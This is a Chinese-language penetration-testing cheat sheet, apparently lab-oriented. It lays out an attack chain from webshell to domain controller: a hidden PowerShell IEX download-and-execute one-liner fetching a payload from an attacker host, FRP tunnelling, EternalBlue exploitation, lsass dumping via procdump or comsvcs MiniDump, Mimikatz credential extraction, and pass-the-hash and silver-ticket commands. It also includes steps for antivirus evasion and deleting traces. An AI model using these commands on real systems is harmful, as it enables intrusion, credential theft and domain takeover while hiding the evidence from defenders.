一、整体攻击链路
蚁剑Webshell → MSF反弹会话 → FRP反向隧道打通内网 → MS17-010永恒之蓝拿下内网Win7(SYSTEM权限)→ Procdump导出lsass内存dump → 本地Mimikatz提取账号Hash → PTH/PTT白银票据拿下域控DC 核心逻辑:Web服务器双网卡作为跳板,FRP隧道解决攻击机无法直连内网网段问题
二、无文件反弹(蚁剑→MSF,规避exe查杀)
-
载荷格式
-
psh-reflection:PowerShell反射载荷,纯文本无PE头,内存执行不落地 -
64位目标必须匹配载荷:
windows/x64/meterpreter/reverse_tcp
-
-
执行命令核心参数
powershell -nop -w hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://攻击机IP:端口/payload.ps1')"-
-nop:跳过配置文件;-w hidden:隐藏黑窗口 -
-exec bypass:绕过系统PowerShell执行策略限制 -
IEX+DownloadString:内存下载执行,不写入磁盘
-
-
配套环境 Kali开启Python简易HTTP服务分发脚本:
python3 -m http.server 8080
三、FRP反向隧道(内网互通核心)
1. 作用
攻击机无法访问内网3.0网段,Web跳板双网卡可通内外网;Web主动连接Kali FRP服务端,在Kali本地开放SOCKS5代理,所有扫描/攻击流量走隧道中转。
2. 部署流程
-
Kali启动frps服务端,监听绑定端口7000
-
Web服务器上传frpc客户端+配置,后台持续运行建立隧道
-
Kali配置
proxychains4代理127.0.0.1:1080 -
扫描、MSF、impacket工具全部加
proxychains前缀走代理
3. 两种载荷选择(内网攻击区分)
-
内网靶机可直连攻击机:
reverse_tcp反向载荷 -
内网隔离无法外联:
bind_tcp绑定端口载荷(攻击机通过隧道主动连接)
四、MS17-010永恒之蓝利用要点
-
前置条件:目标445端口开放、未打MS17-010补丁(Win7经典漏洞)
-
扫描工具:proxychains + nmap/msf smb_ms17_010扫描模块
-
利用配置:匹配系统架构x64载荷,开启自动校验系统与架构
-
权限收益:成功直接获取NT AUTHORITY\SYSTEM最高权限
五、凭据抓取(Procdump + 本地Mimikatz,规避杀软)
1. 方案优势
不在目标运行Mimikatz(极易被杀),仅导出lsass内存dump文件,回传到攻击机本地解析,痕迹少、拦截概率低。
2. 操作步骤
-
Meterpreter查询lsass.exe PID
-
两种dump方式:
-
工具:procdump64.exe
-ma完整导出内存 -
系统原生:
rundll32 comsvcs.dll MiniDump无第三方工具
-
-
dump文件下载至Kali后,目标机器立即删除文件清理痕迹
3. Mimikatz解析关键命令
sekurlsa::minidump lsass.dmp # 加载内存转储文件
sekurlsa::logonpasswords # 提取明文密码、LM/NTLM Hash
-
64位dump必须使用64位Mimikatz,否则读取不出凭据
-
核心产出:域SID、管理员NTLM Hash、krbtgt账号Hash
六、域控渗透两种核心手段
1. Pass-The-Hash(PTH 哈希传递,推荐)
使用impacket工具套件,通过FRP代理直接携带NTLM Hash登录DC,无需票据:
-
wmiexec.py、psexec.py、secretsdump.py(导出全域账号)
-
格式:
账号@DCIP -hashes :NTLM哈希
2. Silver Ticket白银票据(PTT票据注入)
-
生成票据:使用域管理员Hash伪造指定服务(CIFS文件共享)票据
-
上传票据至靶机,Mimikatz执行
kerberos::ptt注入内存 -
验证:
klist查看票据,直接访问DC共享目录 -
对比黄金票据:白银票据仅针对单一服务,隐蔽性更强,但无法全域通用
七、无痕化核心规范
| 操作 | 是否落地文件 | 清理方式 |
|---|---|---|
| PowerShell反弹 | 否(内存执行) | 无痕迹 |
| FRP客户端 | 临时文件 | 渗透结束删除exe |
| lsass dump | 短期落地 | 下载后立刻删除 |
| Mimikatz/票据 | 临时上传 | 注入完成马上删除 |
八、高频故障排查核心点
-
FRP不通:检查Kali防火墙放行绑定端口、跳板能否ping通攻击机
-
永恒之蓝失败:确认445开放、无补丁、载荷架构匹配
-
dump无数据:必须SYSTEM权限、procdump与系统位数一致、dump文件完整(几百MB)
-
PTT无法访问DC:域名/SID/Hash复制无误、klist验证票据存在
-
MSF反弹失效:端口/IP与载荷完全一致、防火墙放行、架构匹配